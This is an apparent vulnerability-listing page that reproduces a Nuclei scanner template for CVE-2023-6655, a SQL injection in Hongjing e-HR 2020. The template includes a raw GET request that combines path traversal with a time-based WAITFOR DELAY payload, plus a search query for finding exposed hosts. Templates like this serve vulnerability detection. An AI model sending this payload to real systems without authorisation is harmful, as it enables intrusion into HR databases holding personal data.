CVE-2023-6655: Hongjing e-HR 2020 - SQL Injection

日期: 2025-08-01 | 影响软件: Hongjing e-HR 2020 | POC: 已公开

漏洞描述

A vulnerability, which was classified as critical, has been found in Hongjing e-HR 2020. Affected by this issue is some unknown functionality of the file /w_selfservice/oauthservlet/%2e./.%2e/general/inform/org/loadhistroyorgtree of the component Login Interface. The manipulation of the argument parentid leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-247358 is the identifier assigned to this vulnerability.

PoC代码[已公开]

id: CVE-2023-6655

info:
  name: Hongjing e-HR 2020 - SQL Injection
  author: pussycat0x
  severity: high
  description: |
    A vulnerability, which was classified as critical, has been found in Hongjing e-HR 2020. Affected by this issue is some unknown functionality of the file /w_selfservice/oauthservlet/%2e./.%2e/general/inform/org/loadhistroyorgtree of the component Login Interface. The manipulation of the argument parentid leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-247358 is the identifier assigned to this vulnerability.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2023-6655
    - https://github.com/Gent5698/vulnerability/blob/main/%E5%AE%8F%E6%99%AF/CVE-2023-6655/README.md
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L
    cvss-score: 7.3
    cve-id: CVE-2023-6655
    cwe-id: CWE-89
    epss-score: 0.03738
    epss-percentile: 0.87512
    cpe: cpe:2.3:a:hrp2000:e-hr:2020:*:*:*:*:*:*:*
  metadata:
    verified: true
    vendor: hrp2000
    product: e-hr
    fofa-query: title="人力资源信息管理系统"
  tags: cve,cve2023,hjsoft,management-system,sqli,vkev,vuln

flow: http(1) && http(2)

http:
  - method: GET
    path:
      - "{{BaseURL}}"

    host-redirects: true
    max-redirects: 2

    matchers:
      - type: dsl
        dsl:
          - "status_code == 200"
          - "contains(body, '/hcm/themes/')"
        condition: and
        internal: true

  - raw:
      - |
        GET /w_selfservice/oauthservlet/%2e./.%2e/general/inform/org/loadhistroyorgtree?isroot=child&parentid=1%27%3BWAITFOR+DELAY+%270%3A0%3A6%27--&kind=2&catalog_id=11&issuperuser=111&manageprive=111&action=111&target= HTTP/1.1
        Host: {{Hostname}}
        Accept-Encoding: gzip, deflate

    matchers:
      - type: dsl
        dsl:
          - "duration >= 6"
# digest: 490a0046304402200940beb1be6205f68b18488e8fc2153bf28b27e3c773f642dd0a068803917b8102204a19beed567dec671e7649d09403100bafafba2315d30b620cf2d9049106015c:922c64590222798bb761d5b6d8e72950
来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2023/CVE-2023-6655.yaml